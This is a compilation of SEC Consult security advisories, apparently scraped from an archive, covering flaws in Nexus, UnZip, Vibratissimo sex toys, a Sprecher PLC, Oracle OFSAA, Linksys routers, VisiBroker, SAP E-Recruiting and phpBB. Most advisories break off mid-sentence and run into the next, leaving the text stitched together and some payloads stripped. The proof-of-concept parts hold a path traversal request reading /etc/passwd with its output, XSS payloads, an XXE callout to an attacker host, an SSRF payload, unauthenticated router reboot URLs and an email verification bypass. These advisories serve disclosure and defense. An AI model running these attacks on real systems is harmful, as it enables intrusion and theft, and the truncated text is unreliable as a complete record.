SEC Consult SA-20180208-0 :: Multiple Cross-Site Scripting Vulnerabilities in Sonatype Nexus Repository Manager OSS/Pro
SEC Consult Vulnerability Lab Security Advisory < 20180208-0 >
===
title: Multiple Cross-Site Scripting Vulnerabilities
product: Sonatype Nexus Repository Manager OSS/Pro
vulnerable version: <=2.14.5, <=3.7.1
fixed version: 2.14.6, 3.8.0
CVE number: CVE-2018-5306, CVE-2018-5307
impact: Medium
homepage: https://www.sonatype.com/
found: 2017-12-12
by: Werner Schober, Daniel Ostovary (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"At Sonatype we have a long history of partnership with the world of open
source software development. From our humble beginning as core contributors
to Apache Maven, to supporting the world’s largest repository of open source
components (Central), to distributing the world's most popular repository
manager (Nexus), we exist for one simple reason; to help accelerate software
innovation."
Source: https://www.sonatype.com/about-sonatype
Business recommendation:
The Sonatype Nexus Repository Server is affected by multiple XSS vulnerabilities
which could be used by an attacker to execute JavaScript code in the user's
browser.
The vendor provides a patch for both version 2 and 3 of the product which should
be installed immediately.
It is recommended to conduct a thorough security review by IT security
professionals in order to identify potential other security issues.
Vulnerability overview/description:
---
1) Reflected XSS vulnerability
The parameters "repoId" and "format" of the "healthCheckFileDetail" function
are vulnerable to reflected XSS. If the attacker can lure a user into
clicking a crafted link he could execute arbitrary JavaScript code.
In case the user has sufficient permissions, an attacker can create arbitrary
(administrative) users or perform stored XSS attacks (see 2).
2) Stored XSS vulnerabilities
The application is vulnerable to multiple stored XSS vulnerabilities,
which are described in the following list.
2.1) The first one is located in the "File Upload" functionality of
the "Staging Upload". Uploading a file with JavaScript code
in its name allows to store JavaScript code, which gets
triggered every time the file name is shown (e.g. in "Repositories").
2.2) The second stored XSS vulnerability is more precisely
being considered as stored DOM injection. This vulnerability
affects the functionality of creating a new user. When doing
so it is possible to inject JavaScript/HTML code in the username,
which later gets rendered/executed every time the username is
displayed.
2.3) The third stored XSS vulnerability is also a stored DOM injection.
It affects the "IQ Server Connection"/"IQ Server Dashboard"
functionality. The "IQ Server URL" field in the "IQ Server
Connection" allows to inject JavaScript/HTML code into the
menu bulletpoint "IQ Server Dashboard".
The vendor provided the following CVE numbers:
* CVE-2018-5306 - covers the XSS vulnerabilities in Nexus 3
* CVE-2018-5307 - covers the XSS vulnerabilities in Nexus 2
Proof of concept:
-
1) Reflected XSS vulnerability
By luring an attacker into clicking the following link, an arbitrary
JavaScript payload will be executed:
https://example.com/nexus/service/siesta/healthcheck/healthCheckFile
Detail/.../index.html?repoId=public=sectest
Vulnerable parameters:
-) repoId
-) format
2) Stored XSS vulnerabilities
***Please note that only users with access to the respective functionalities
are susceptive to the following stored XSS vulnerabilities.***
2.1)
The staging upload allows an attacker to upload a file, which contains a
JavaScript payload in the filename. An example for a filename containing a
"malicious" payload is as follows: ".jpg"
This file can be uploaded flawlessly and everytime the filename is displayed,
the JavaScript payload gets executed.
2.2)
An attacker is able to create a new user, which contains a malicious JavaScript
payload in the username. As an example the following username can be used:
"EvilAdmin Create Repository -> Access repository via "Repositories" ->
JavaScript code is being executed)
2.3)
The nexus server allows to setup an IQ server connection. The server name is not
validated and therefore allows the permanent injection of JavaScript code. To
demonstrate the vulnerability
SEC Consult SA-20180207-0 :: Multiple buffer overflow vulnerabilities in InfoZip UnZip
SEC Consult Vulnerability Lab Security Advisory < 20180207-0 >
===
title: Multiple buffer overflow vulnerabilities
product: InfoZip UnZip
vulnerable version: UnZip <= 6.00 / UnZip <= 6.1c22
fixed version: 6.10c23
CVE number: CVE-2018-131,CVE-2018-132,CVE-2018-133
CVE-2018-134,CVE-2018-135
impact: high
homepage: http://www.info-zip.org/UnZip.html
found: 2017-11-03
by: R. Freingruber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"UnZip is an extraction utility for archives compressed in .zip format (also
called "zipfiles"). Although highly compatible both with PKWARE's PKZIP and
PKUNZIP utilities for MS-DOS and with Info-ZIP's own Zip program, our
primary objectives have been portability and non-MSDOS functionality.
UnZip will list, test, or extract files from a .zip archive, commonly found
on MS-DOS systems. The default behavior (with no options) is to extract into
the current directory (and subdirectories below it) all files from the
specified zipfile."
Source: http://www.info-zip.org/UnZip.html
InfoZip's UnZip is used as default utility for uncompressing ZIP archives
on nearly all *nix systems. It gets shipped with many commerical products on
Windows to provide (un)compressing functionality as well.
Business recommendation:
InfoZip Unzip should be updated to the latest available version.
Vulnerability overview/description:
---
1) Heap-based buffer overflow in password protected ZIP archives
(CVE-2018-135)
InfoZip's UnZip suffers from a heap-based buffer overflow when uncompressing
password protected ZIP archives. An attacker can exploit this vulnerability
to overwrite heap chunks to get arbitrary code execution on the target system.
For newer builds the risk for this vulnerability is partially mitigated
because modern compilers automatically replace unsafe functions with length
checking variants of the same function (for example sprintf gets replaced
by sprintf_chk). This is done by the compiler at locations were the length
of the destination buffer can be calculated.
Nevertheless, it must be mentioned that UnZip is used on many systems
including older systems or on exotic architectures on which this protection
is not in place. Moreover, pre-compiled binaries which can be found on the
internet lack the protection because the last major release of InfoZip's
UnZip was in 2009 and compilers didn't enable this protection per default at
that time. The required compiler flags are also not set in the Makefile of
UnZip. Compiled applications are therefore only protected if the used compiler
has this protection enabled per default which is only the case with modern
compilers.
To trigger this vulnerability (and the following) it's enough to uncompress
a manipulated ZIP archive. Any of the following invocations can be used to
trigger and abuse the vulnerabilities:
>unzip malicious.zip
>unzip -p malicious.zip
>unzip -t malicious.zip
2) Heap-based out-of-bounds write (CVE-2018-131)
This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap-based out-of-bounds write if the
archive filename does not contain a .zip suffix.
3) Heap/BSS-based buffer overflow (Bypass of CVE-2015-1315) (CVE-2018-132)
This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap/BSS-based buffer-overflow which
can be used to write null-bytes out-of-bound when converting
attacker-controlled strings to the local charset.
4) Heap out-of-bounds access in ef_scan_for_stream (CVE-2018-133)
This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from a heap out-of-bounds access
vulnerability.
5) Multiple vulnerabilities in the LZMA compression algorithm (CVE-2018-134)
This vulnerability only affects UnZip 6.1c22 (next beta version of UnZip).
InfoZip's UnZip suffers from multiple vulnerabilities in the LZMA
implementation. Various crash dumps have been supplied to the vendor
but no further analysis has been performed.
Proof of concept:
-
1) Heap-based buffer overflow in password protected ZIP archives
(CVE-2018-135)
Unzipping a malicious archive results in the following output:
(On Ubuntu 16.04 with UnZip 6.0 which was installed via aptitude install unzip)
SEC Consult SA-20180201-0 :: Multiple critical vulnerabilities in Whole Vibratissimo Smart Sex Toy product range
We have published an accompanying blog post to this technical advisory with
further information:
https://www.sec-consult.com/en/blog/2018/02/internet-of-dildos-a-long-way-to-a-vibrant-future-from-iot-to-iod/index.html
SEC Consult Vulnerability Lab Security Advisory < 20180201-0 >
===
title: Multiple critical vulnerabilities
product: Whole Vibratissimo Smart Sex Toy product range
vulnerable version: <6.3 (iOS), <6.2.2 (Android), <2.0.2 (Firmware)
fixed version: 6.3 (iOS), 6.2.2 (Android), 2.0.2 (Firmware)
CVE number: -
impact: critical
homepage: http://www.vibratissimo.com
found: 2017-10-01
by: W. Schober (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Control with Vibratissimo your AMOR Toy on your smartphone and get even more
features by the app. With Vibratissimo you are open to new and exciting
opportunities, whether you are in the same room or on different continents."
Source: http://www.vibratissimo.com/en/index.html
Business recommendation:
SEC Consult highly recommends to update the app to the newest version available
in the appstore. Furthermore the password, which was used within the app,
should be changed immediately. If the password was used for multiple services,
all passwords should be changed. To get rid of issue number 3 (Unauthenticated
Bluetooth LE Connections) a firmware update can be applied. To apply the
firmware update the devices have to be sent to Amor Gummiwaren GmbH.
Vulnerability overview/description:
---
1) Customer Database Credential Disclosure
The credentials for the whole Vibratissimo database environment were exposed on
the internet. Due to the fact, that the PHPMyAdmin interface was exposed as
well,
an attacker could have been able to connect to the database and dump the whole
data set. The dataset contains for example the following data:
- Usernames
- Session Tokens
- Cleartext passwords
- chat histories
- explicit image galleries, which are created by the users themselves
2) Exposed administrative interfaces on the internet
An administrative interface for databases was available without any filtering to
the whole internet. In combination with other vulnerabilities an attacker
could have been able to get access to the whole database data and even take over
the server.
3) Cleartext Storage of Passwords
The user passwords were stored unhashed in cleartext in the database.
If an attacker gained access to the database (e.g. via credential disclosure),
he could have been able to retrieve the plaintext passwords of users and abuse
their privileges in the system.
4) Unauthenticated Bluetooth LE Connections
The sex toys are connected without prior authentication to the app, which is the
standard use case. For example one of the identified Bluetooth services allows
to read the current device temperature. Other services, which can be
accessed without prior authentication are:
-) Setting the "intensity" of the current vibration pattern
-) Reading various values (Temperature, etc)
5) Insufficient Authentication Mechanism
The android application is using a type of authentication, which is against
known best practice. The username and password are sent with every
request to the server to authenticate and authorise the request. There is no
session management implemented. However, the authentication credentials are
transmitted via an encrypted SSL/TLS connection.
6) Insecure Direct Object Reference
Due to flaws in the authorization schema, an authorization bypass vulnerability
allows an attacker to get access to restricted functions and resources. In this
case a user is able to set a profile picture by uploading a provided image. The
image is stored on the Vibratissimo server and renamed. All images are renamed
by incrementing a global number and assigning this number as the name of the
image (e.g 200.png). An attacker is now able to iterate through those images and
dump personal user images containing partially explicit content. The image can
even be accessed if the profile has been set to "hidden" by the user.
7) Missing Authentication in Remote Control
The mobile apps allow their users to use a feature called quick control.
This feature allows to send a link with a unique ID to an email address or a
telephone via SMS to get direct control of the sex toy over the internet.
This wouldn't be a problem in gener
SEC Consult SA-20180131-0 :: Multiple Vulnerabilities in Sprecher Automation SPRECON-E-C, PU-2433
SEC Consult Vulnerability Lab Security Advisory < 20180131-0 >
===
title: Multiple Vulnerabilities
product: Sprecher Automation SPRECON-E-C, PU-2433
vulnerable version: <8.49 (most vulnerabilities, see "Vulnerable version" for
details)
fixed version: 8.49 (most vulnerabilities, see "Solution" for details)
CVE number: -
impact: Medium
homepage: https://www.sprecher-automation.com
found: 2017-08-15
by: T. Weber, C.A. (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Sprecher Automation GmbH offers switchgears and automation solutions
for energy, industry and infrastructure processes. Our customers are
power utilities, industries, transportation companies, municipal
utilities and public institutions.
Company-own developments and cooperations with technology
partners lead to a unique product portfolio consisting of traditional
electrical technologies as well as high-tech electronics."
Source: https://www.sprecher-automation.com/en/
Business recommendation:
SEC Consult recommends to immediately patch the systems and follow the
hardening guide provided by the vendor (SEC Consult did not have access to the
hardening guide in order to review it).
A thorough security review should be performed by security professionals as
further security issues might exist within the product.
Vulnerability overview/description:
---
1) Authenticated Path Traversal Vulnerability
The web interface of the Sprecher PLC suffers from a path traversal
vulnerability. A user which is authenticated on the web interface,
which is intended as read-only interface, can download files with the
permissions of the webserver (www-data).
Files like "/etc/shadow" are not readable for the webserver.
2) Client-Side Password Hashing
The password hashes which are stored on the system can be directly
used to authenticate on the web interface (pass-the-hash) since the password
is hashed in the browser of the user during login.
3) Missing Authentication
The PLC exposes a Telnet management service on TCP port 2048.
This interface can be used to control the PLC and does not require any
authentication.
4) Permanent Denial of Service via Portscan
An aggressive TCP SYN scan on a large amount of ports triggers a denial
of service of the PLC service. This results in an persistent DoS of the
standby PLC in an active - standby pair. Manual operator intervention is
required to restore service availability.
5) Outdated Linux Kernel
An ancient Linux kernel version with a high number of known security weaknesses
is used for the PLC base operating system.
Proof of concept:
-
1) Authenticated Path Traversal Vulnerability
Reading "passwd" is possible by triggering the following request:
---
GET /webserver/cgi-bin/spre.cgi?4_1=../../../../../../../etc/passwd HTTP/1.1
Host:
Cookie: sid=
Connection: close
Upgrade-Insecure-Requests: 1
---
The file is directly fetched from the system:
---
root:x:0:0:root:/root:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
[...]
---
2) Client-Side Password Hashing
The passwords are hashed in JavaScript before they are transmitted to the
device. Therefore the hash is as good as the password.
The following request shows a login process:
---
POST /webserver/cgi-bin/spre.cgi HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/json
Accept-Language: de
Content-Type: application/x-www-form-urlencoded
If-Modified-Since: Sat, 1 Jan 2000 00:00:00 GMT
Referer: http:///We
SEC Consult SA-20180123-0 :: XXE & Reflected XSS in Oracle Financial Services Analytical Applications
SEC Consult Vulnerability Lab Security Advisory < 20180123-0 >
===
title: XXE & Reflected XSS
product: Oracle Financial Services Analytical Applications
vulnerable version: 7.3.5.x, 8.0.x
fixed version: Oracle CPU January 2018
CVE number: CVE-2018-2660, CVE-2018-2661
impact: High
homepage: http://www.oracle.com/us/products/applications/
financial-services/analytical-applications/index.html
found: 2017-06-15
by: Mohammad Shah Bin Mohammad Esa, Samandeep Singh
(Office Singapore)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Oracle is the unchallenged leader in Financial Services, with an
integrated, best-in-class, end-to-end solution of intelligent software
and powerful hardware designed to meet every financial service need."
Source: http://www.oracle.com/us/products/applications/
financial-services/analytical-applications/index.html
Business recommendation:
By exploiting the XXE vulnerability, an attacker can get read access to the
filesystem of the user's system using the OFSAA web application and thus obtain
sensitive information from the system. It is also possible to bypass input
validation checks in order to inject JavaScript code.
SEC Consult recommends to immediately install the patched version.
Furthermore, a thorough security review should be performed by security
professionals to identify potential further security issues.
Vulnerability overview/description:
---
1) XML eXternal Entity (XXE) Injection (CVE-2018-2660)
The web application allows users to import XML files. An attacker can import a
specially crafted XML file and exploit the XXE vulnerability within the
application.
2) Reflected Cross Site Scripting (CVE-2018-2661)
This vulnerability allows an unauthenticated user to inject malicious client
side script which will be executed in the browser of a user if he visits
the manipulated URL.
Proof of concept:
-
1) XML External Entity Injection (XXE) (CVE-2018-2660)
For example, by importing the following XML code in the "Business Model Upload"
function a connection request from the server to the attacker's system will be
made.
http://[IP:port]/; >]>
IP:port = IP address and port where the attacker is listening for connections
Furthermore some files can be exfiltrated to remote servers via the
techniques described in:
https://media.blackhat.com/eu-13/briefings/Osipov/bh-eu-13-XML-data-osipov-wp.pdf
http://vsecurity.com/download/papers/XMLDTDEntityAttacks.pdf
2) Reflected Cross Site Scripting (CVE-2018-2661)
The following parameters have been found to be vulnerable to
reflected cross site scripting attacks. Furthermore, there are many more
vulnerable parameters.
The following payload shows a simple alert message box:
URL : http://$DOMAIN/OFSAA/admin/PopupAlert_H5.jsp?winTitle=
METHOD : GET
PAYLOAD :
winTitle=a%3C/title%3E%3Cimg%0A%20src=x%20onerror=%22prompt%0A%28%27SEC%20consult%20-%20XSS%27%29%22%3E
URL : http://$DOMAIN/OFSAA/fsapps/common/MM_PageOpener_crossBrowser.jsp?
url=fetchErrorMessages.action=OCBCOFSAASG=summarypage={62}~
METHOD : GET
PAYLOAD : errorMessage={62}~%27;alert%0a(0);//=DeleteConfirm
Vulnerable / tested versions:
-
The following version has been tested which was the most recent one when
the vulnerabilities were discovered:
* Oracle Financial Services Analytical Applications 8.0.4.0.0
According to Oracle all versions 7.3.5.x and 8.0.x are affected before CPU
January 2018.
Vendor contact timeline:
2017-09-11: Contacting vendor through encrypted email (secalert...@oracle.com)
2017-09-20: Vendor requested to postpone the release date
2018-01-13: Vendor informed that Critical Patch Update that includes fixes
of reported issues will be released on 2018-01-16.
CVE-2018-2660 & CVE-2018-2661 were assigned for the issues
2018-01-23: Public disclosure of advisory
Solution:
-
Apply patch update in the January 2018 Critical Patch Update:
http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html
Workaround:
---
None
Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin
SEC Consult SA-20171018-1 :: Multiple vulnerabilities in Linksys E-series products
SEC Consult Vulnerability Lab Security Advisory < 20171018-1 >
===
title: Multiple vulnerabilities
product: Linksys E series, see "Vulnerable / tested versions"
vulnerable version: see "Vulnerable / tested versions"
fixed version: no public fix, see solution/timeline
CVE number: -
impact: high
homepage: http://www.linksys.com/
found: 2017-06-26
by: T. Weber (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"Today, Belkin International has three brands – Belkin, Linksys and WeMo
– to enhance the technology that connects us to the people, activities
and experiences we love. Belkin products are renowned for their
simplicity and ease of use, while our Linksys brand helped make
wireless connectivity mainstream around the globe. Our newest brand,
WeMo, is the leader in delivering customizable smart home experiences.
Its product platform empowers people to monitor, measure and manage
their electronics, appliances and lighting at home and on-the-go."
Source: http://www.belkin.com/uk/aboutUs/
Business recommendation:
SEC Consult recommends not to use this product in a production environment
until a thorough security review has been performed by security
professionals and all identified issues have been resolved.
Vulnerability overview/description:
---
1) Denial of Service (DoS)
A denial of service vulnerability is present in the web server of the
device. This vulnerability is very simple to trigger since a single GET
request to a cgi-script is sufficient.
A crafted GET request, e.g. triggered by CSRF over a user in the
internal network, can reboot the whole device or freeze the web interface
and the DHCP service. This action does not require authentication.
2) HTTP Header Injection & Open Redirect
Due to a flaw in the web service a header injection can be triggered
without authentication. This kind of vulnerability can be used to perform
different arbitrary actions. One example in this case is an open redirection
to another web site. In the worst case a session ID of an authenticated user
can be stolen this way because the session ID is embedded into the url
which is another flaw of the web service.
3) Improper Session-Protection
The session ID for administrative users can be fetched from the device from
LAN without credentials because of insecure session handling.
This vulnerability can only be exploited when an administrator was
authenticated to the device before the attack and opened a session previously.
The login works if the attacker has the same IP address as the PC
of the legitimate administrator. Therefore, a CSRF attack is possible when
the administrator is lured to surf on a malicious web site or to click on
a malicious link.
4) Cross-Site Request Forgery Vulnerability in Admin Interface
A cross-site request forgery vulnerability can be triggered in the
administrative interface. This vulnerability can be exploited because the
session ID can be hijacked by using 3) via LAN. An exploitation via internet
is only possible if the session id is exposed to the internet (for example via
the referrer).
An attacker can change any configuration of the device by luring a user to
click on a malicious link or surf to a malicious web-site.
5) Cross-Site Scripting Vulnerability in Admin Interface
A cross-site scripting vulnerability can be triggered in the administrative
interface. This vulnerability can be exploited because the session ID can
be hijacked by using 3) via LAN. An exploitation via internet is only possible
if the session id is exposed to the internet (for example via the referrer).
By using this vulnerability, malicious code can be executed in the context of
the browser session of the attacked user.
Proof of concept:
-
1) Denial of Service
Unauthenticated request for triggering a router reboot in browser:
http:///upgrade.cgi
http:///restore.cgi
Unauthenticated request for triggering a router freeze in browser:
http:///mfgtst.cgi
2) HTTP Header Injection & Open Redirect
A header injection can be triggered by the following unauthenticated request:
Request:
--
POST /UnsecuredEnable.cgi HTTP/1.1
Host:
Accept: */*
Accept-Language: en
Connection: close
Referer: http:///Unsecured.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 97
SEC Consult SA-20171016-0 :: Multiple vulnerabilities in Micro Focus VisiBroker C++
SEC Consult Vulnerability Lab Security Advisory < 20171016-0 >
===
title: Multiple vulnerabilities
product: Micro Focus VisiBroker C++
vulnerable version: 8.5 SP2
fixed version: 8.5 SP4 HF3
CVE number: CVE-2017-9281, CVE-2017-9282, CVE-2017-9283
impact: High
homepage: https://www.microfocus.com/products/corba/visibroker/
found: 2017-04
by: W. Ettlinger (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"VisiBroker(TM) is a comprehensive CORBA environment for developing, deploying,
and managing distributed applications. Built on open industry standards and a
high-performance architecture, VisiBroker is especially suited to low-latency,
complex, data-oriented, transaction-intensive, mission-critical environments.
Using VisiBroker(R), organizations can develop, connect, and deploy complex
distributed applications that have to meet very high performance and reliability
standards. With more than 30 million licenses in use, VisiBroker is the world’s
most widely deployed CORBA Object Request Broker (ORB) infrastructure."
URL: https://www.microfocus.com/products/corba/visibroker/
Business recommendation:
During a superficial fuzzing test, SEC Consult found several memory corruption
vulnerabilities that allow denial of service attacks or potentially arbitrary
code execution. Although the fuzzing test only had a very limited coverage,
several vulnerabilities have been identified. Assuming the code quality is
homogenous, it is possible that other parts of the application exhibit similar
issues.
SEC Consult did not attempt to fully evaluate the potential impact of the
identified vulnerabilities.
SEC Consult recommends to decommission any VisiBroker C++ component that
communicates with untrusted entities until a full security audit has been
performed. Moreover, SEC Consult recommends to restrict network access to all
CORBA services that utilize the VisiBroker C++ environment.
Vulnerability overview/description:
---
1) Integer Overflow / Out of Bounds Read (Denial of Service) [CVE-2017-9281]
By specifying a large value for a length field, an integer overflow occurs.
As a result, the application reads memory until a non-mapped memory region
is reached. This causes the application to encounter a segmentation fault.
2) Integer Overflow (Heap Overwrite) [CVE-2017-9282]
By specifying a manipulated value for a length field an attacker can cause an
integer overflow. This causes the application to allocate too little memory.
When the application attempts to write to this memory buffer, heap memory is
overwritten leading to denial of service or potentially arbitrary code
execution.
3) Out of Bounds Read [CVE-2017-9283]
By specifying a manipulated value for a length field, an attacker can cause
the application to read past an allocated memory region.
4) Use after Free
SEC Consult found that the application under certain circumstances tries to
access a memory region that has been deallocated before.
It is unclear whether Micro Focus fixed the root cause of this behaviour. As
the vendor was unable to reproduce the vulnerability in the current version,
Micro Focus believes that the vulnerability was fixed with a previous update.
Since SEC Consult is unsure whether Micro Focus found the root cause of the
vulnerability, we refrain from releasing proof of concept code.
Proof of concept:
-
A service implementing the following IDL was used to identify the
vulnerabilities listed here:
module Bank {
interface Account {
float balance(in string test);
};
interface AccountManager {
Account open(in string name);
};
};
The implemented service was based on the Visibroker example project
"bank_agent".
1) Integer Overflow / Out of Bounds Read (Denial of Service)
The method
CORBA_MarshalOutBuffer *__cdecl CORBA_MarshalOutBuffer::put(
CORBA_MarshalOutBuffer *this,
const char *src,
unsigned int size)
is used to copy/append a char[] into a buffer. If the size of the data that is
stored in the buffer plus the size of the char[] to be appended exceeds the
allocated size, the method reallocates the buffer. By choosing the
size of the char[] as e.g. 0x (on 32 bit systems) an integer overflow
can be caused. The method then continues without allocating additional memory.
However, the application then expects that the source buffer contains 0x
bytes o
SEC Consult SA-20170912-0 :: Email verification bypass in SAP E-Recruiting
SEC Consult Vulnerability Lab Security Advisory < 20170912-0 >
===
title: Email verification bypass
product: SAP E-Recruiting
vulnerable version: 605, 606, 616, 617
fixed version: see SAP security note number 2507798
impact: medium
homepage: https://www.sap.com
found: 2017-07-12
by: Marc Nimmerrichter (Office Vienna)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"SAP E-Recruiting" has recruitment and succession planning instruments that
will help your company find new employees, employ them in positions that suit
their capabilities, promote their professional development, and retain them in
the long term.
As well as enabling you to handle your company’s applicant tracking activities,
"SAP E-Recruiting" ensures that you drive up-to-date human resources management,
by proactively maintaining contact with applicants, potential candidates, and
consequently, with your employees.
Source:
https://help.sap.com/saphelp_erp60_sp/helpdata/en/73/8bcf535b804808e1000a174cb4/frameset.htm
Business recommendation:
Email address verification during the applicant registration can be bypassed.
Businesses using the vulnerable component are advised to estimate the impact of
insufficient email address verification on their business processes and react
accordingly. It is recommended to install a patched version as soon as possible.
Vulnerability overview/description:
---
When an external applicant registers to the E-Recruiting application, he/she
receives a link by email to confirm access to the provided email address.
However, this measure can be bypassed and attackers can register and confirm
email addresses that they do not have access to.
An attacker could register email addresses not belonging to him/her. This could
have a business impact, because business processes might rely on a verified
email address. Furthermore, since an email address can be registered only once,
an attacker could prevent other legitimate users from registering to the
E-Recruiting application.
Proof of concept:
-
The email verification link contains the "param" HTTP GET parameter with base64
encoded data. When decoded, this data contains the parameters
"candidate_hrobject" and "corr_act_guid". candidate_hrobject is an incremental
user ID. corr_act_guid is a random value that needs to be provided during the
email verification. However, this value is not bound to the current
registration, which means that the value of a previous registration can be
reused. Since candidate_hrobject is incremental, it can be guessed by an
attacker. An attacker who wants to register with an email address not belonging
to him/her, could simply do the following:
1. Register with his own email address
2. Directly afterwards register with someone else's email address
3. Read the current value of candidate_hrobject in the confirmation
link from the first registration
4. Increment this value by 1
5. Send the new value in the HTTP GET request, use the corr_act_guidparameter
from the first registration
6. If this did not work: go back to step 4 to try the next ID
(maybe other people registered in between the two registrations)
This attack works because there is no per-registration nonce in the
confirmation link.
Vulnerable / tested versions:
-
The vulnerability was found in the following release of E-Recruiting (ERECRUIT):
Release: 617
According to the vendor, the following versions are affected:
Release: 605, 606, 616, 617
Vendor contact timeline:
2017-07-12: Contacted vendor via encrypted email with vulnerability description
and Responsible Disclosure Policy attached at sec...@sap.com
2017-07-13: Vendor confirmed the receipt of the email
2017-07-25: Vendor confirmed the vulnerability
2017-07-31: Contacted vendor to ask for patch release date and versions affected
2017-08-01: Vendor stated they are working on the fix and requested "adequate
time". Link to SAP Responsible Disclosure Policy was provided.
2017-08-01: Discussing release date, requested planned patch release date and
versions affected.
2017-08-02: Vendor stated that the patch cannot be published until 2017-08-31
and requested more time before advisory publication.
2017-08-23: Contacted vendor to request current patch status, planne
SEC Consult SA-20170804-0 :: phpBB Server Side Request Forgery (SSRF) vulnerability
SEC Consult Vulnerability Lab Security Advisory < 20170804-0 >
===
title: Server Side Request Forgery Vulnerability
product: phpBB
vulnerable version: 3.2.0
fixed version: 3.2.1
CVE number:
impact: Medium
homepage: https://www.phpbb.com/
found: 2017-05-21
by: Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
===
Vendor description:
---
"phpBB is a free flat-forum bulletin board software solution that can be used
to stay in touch with a group of people or can power your entire website. With
an extensive database of user-created extensions and styles database
containing hundreds of style and image packages to customise your board, you
can create a very unique forum in minutes."
Source: https://www.phpbb.com/
Business recommendation:
The patch should be installed immediately. Furthermore, SEC Consult recommends
to perform a thorough security review of this software.
Vulnerability overview/description:
---
The phpBB forum software is vulnerable to the server side request forgery
(SSRF) attack. An attacker is able to perform port scanning, requesting
internal content and potentially attacking such internal services via the
web application's "Remote Avatar" function.
Proof of concept:
-
This vulnerability can be exploited by an attacker with a registered account
as low as a normal account. If the web application enables remote avatar, this
feature could be abused by an attacker to perform port scanning. Below is the
example on how the SSRF issue can be exploited.
URL : http://$DOMAIN/ucp.php?i=ucp_profile=avatar
METHOD : POST
PARAMETER : avatar_remote_url
PAYLOAD : http://$DOMAIN:$PORT/x.jpg
Vulnerable / tested versions:
-
phpBB version 3.2.0 has been tested. This version was the latest
at the time the security vulnerability was discovered.
Vendor contact timeline:
2017-05-23: Contacting vendor through security bug tracker.
2017-05-29: Vendor confirms the vulnerabilities and working on the fixes.
2017-07-12: Vendor requesting extension for deadline of 5 days from the
latest possible release date.
2017-07-17: Patch released by the vendor.
2017-08-04: Public release of the advisory.
Solution:
-
Upgrade to phpBB 3.2.1
For further information see:
https://www.phpbb.com/community/viewtopic.php?f=14=14782136
Workaround:
---
Advisory URL:
-
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~
Mail: research at sec-consult dot com
